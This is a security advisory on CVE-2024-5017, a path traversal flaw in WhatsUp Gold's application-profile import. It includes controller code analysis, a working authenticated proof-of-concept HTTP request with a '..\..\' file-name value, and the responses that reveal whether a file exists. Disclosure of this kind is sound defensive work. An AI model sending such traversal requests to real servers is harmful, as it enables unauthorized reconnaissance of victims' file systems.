CVE-2024-5017
A path traversal vulnerability exists in the AppProfileImport functionality of Progress Software Corporation WhatsUp Gold 23.1.0 Build 1697. A specially crafted HTTP request can lead to information disclosure. An attacker can make an authenticated HTTP request to trigger this vulnerability.
The versions below were either tested or verified to be vulnerable by Talos or confirmed to be vulnerable by the vendor.
Progress Software Corporation WhatsUp Gold 23.1.0 Build 1697
WhatsUp Gold - https://www.whatsupgold.com/
6.5 - CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N
CWE-22 - Improper Limitation of a Pathname to a Restricted Directory (‘Path Traversal’)
WhatsUp Gold is a network monitoring and management software developed by Progress. WhatsUp Gold is designed to provide visibility into IT infrastructure, allowing organizations to monitor the performance and health of networks, devices, servers, applications, and other critical components. It offers features such as network mapping, performance monitoring, alerting, and reporting to help IT professionals ensure the optimal functioning of their network infrastructure.
An authenticated user can upload a new Application profile definition file (xml) for monitoring triggering the following actions :
Settings - > Application monitoring - > Application and profile setup - > Application Profiles -> Import
Let us take a look at controler implementation responsible for handling this action:
Apm.UI\Apm\UI\Areas\APM\Controllers\Api\Applications\AppProfileImportController.cs
Line 1 namespace Apm.UI.Areas.APM.Controllers.Api.Applications
Line 2 {
Line 3 public class AppProfileImportController : ApplicationControllerBase
Line 4 {
Line 5
Line 6 (...)
Line 7
Line 8 public async Task<HttpResponseMessage> Post(string fileName, int uploadOption)
Line 9 {
Line 10
Line 11 (...)
Line 12
Line 13 if (uploadOption == 0 && File.Exists(getPath(fileName)))
Line 14 {
Line 15 return getResponse(new ResultModel
Line 16 {
Line 17 message = "FILE_EXISTS",
Line 18 success = false
Line 19 });
Line 20 }
Line 21 }
Line 22
Line 23 private string getPath(string fileName = null)
Line 24 {
Line 25 string text = HostingEnvironment.MapPath("~/Content/Apm/Import");
Line 26 if (!string.IsNullOrWhiteSpace(fileName))
Line 27 {
Line 28 return Path.Combine(text, fileName);
Line 29 }
Line 30 return text;
Line 31 }
Apparent from the above is that the fileName argument is fully controlled by an attacker and is used in File.Exists function argument at line 15.
We can also observe that there is no path traversal protection implemented inside getPath function line 22 and directly controlled fileName value is just combined with usage of Path.Combine function line 27.
Such conditions allows the attacker to conduct path traversal attack and check an existence of any file within the file system.
An attacker needs to be authenticated and send the follwing request
REQ
POST /NmConsole/api/core/AppProfileImport?fileName=..\..\..\..\..\..\..\..\swapfile.sys&uploadOption=0 HTTP/1.1
Host: 192.168.0.252
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: pl,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate, br
Content-Type: multipart/form-data; boundary=---------------------------25967750313659734821777115140
Content-Length: 37688
Origin: http://192.168.0.252
Connection: close
Referer: http://192.168.0.252/NmConsole/
Cookie: ASP.NET_SessionId=p5pzkxhx4kilqqvufzxf05se; langid=1033; .ASPXAUTH=A488824F3A736795051CAAE0DDDEE70583758077C846B3D8F8F706975CAC36BC398E5E9D4C0271BC05C2D70FD62F7CC774F6FE917C7F9862B7CEEE71B8557B3C125F06FD92F5C9FB8768C6DD2DD252A3072C5E021874340B90835928157EC9FE
Upgrade-Insecure-Requests: 1
-----------------------------25967750313659734821777115140
Content-Disposition: form-data; name="filefield-2438-button"; filename="Apache Web Server-Linux.xml"
Content-Type: text/xml
<?xml version="1.0"?>
<EntityAPMApplication xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema">
<Name>Apache Server</Name>
<Description>Monitors the health and performance of Apache Web Server on Linux. Specify non-standard port in the Attributes section below. Requires SNMP enabled on the Linux system hosting Apache Web Server and access to the Apache server-status web page.</Description>
<ApplicationID>102</ApplicationID>
<ApplicationType>
<Name>Apache HTTP Server</Name>
<Description>Apache</Description>
<ApplicationTypeID>1009</ApplicationTypeID>
<IconPath>apache.png</IconPath>
</ApplicationType>
(...)
-----------------------------25967750313659734821777115140--
RESP
HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/plain
Expires: -1
Server: Microsoft-IIS/10.0
Set-Cookie: langid=1033; path=/; HttpOnly
X-AspNet-Version: 4.0.30319
X-Frame-Options: SAMEORIGIN
X-Content-Type-Options: nosniff
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
X-XSS-Protection: 1; mode=block
X-Powered-By: ASP.NET
Date: Fri, 26 Jan 2024 12:09:28 GMT
Connection: close
Content-Length: 41
{"success":false,"message":"FILE_EXISTS"}
If checked file does not exist the server returns the following response:
RESP
HTTP/1.1 500 Internal Server Error
Cache-Control: no-cache
Pragma: no-cache
Content-Type: application/xml; charset=utf-8
Expires: -1
Server: Microsoft-IIS/10.0
Set-Cookie: langid=1033; path=/; HttpOnly
X-AspNet-Version: 4.0.30319
X-Frame-Options: SAMEORIGIN
X-Content-Type-Options: nosniff
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
X-XSS-Protection: 1; mode=block
X-Powered-By: ASP.NET
Date: Fri, 26 Jan 2024 11:58:40 GMT
Connection: close
Content-Length: 56
<Error><Message>An error has occurred.</Message></Error>
2024-02-07 - Initial Vendor Contact
2024-02-12 - Vendor Disclosure
2024-06-25 - Vendor Patch Release
2024-06-26 - Public Release
Discovered by Marcin 'Icewall' Noga of Cisco Talos.